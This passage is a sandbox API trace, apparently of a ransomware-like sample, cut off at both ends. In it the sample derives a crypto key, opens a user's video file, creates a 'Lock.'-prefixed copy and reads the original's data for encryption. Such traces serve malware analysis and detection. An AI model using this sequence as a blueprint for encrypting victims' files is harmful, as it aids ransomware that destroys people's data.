RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0258.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e516b8 [0258.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e516b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0258.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0258.401] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0258.401] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0258.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0258.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0258.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0258.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.404] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0258.404] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0258.404] CryptDestroyHash (hHash=0xa87310) returned 1 [0258.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0258.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0258.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.405] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/hRmi.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\hrmi.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0258.405] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0258.405] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0258.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0258.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0258.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0258.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.407] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0258.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0258.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0258.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0258.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.408] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.hRmi.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\lock.hrmi.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0258.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0258.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0258.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0258.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0258.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0258.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0258.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0258.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0258.414] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x3279, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0258.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0258.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0258.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0258.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3279) returned 0x3bf0050 [0258.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0258.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0258.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0258.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3279) returned 0x3bf0050 [0258.481] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0258.481] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0258.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0258.481] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0258.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.483] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 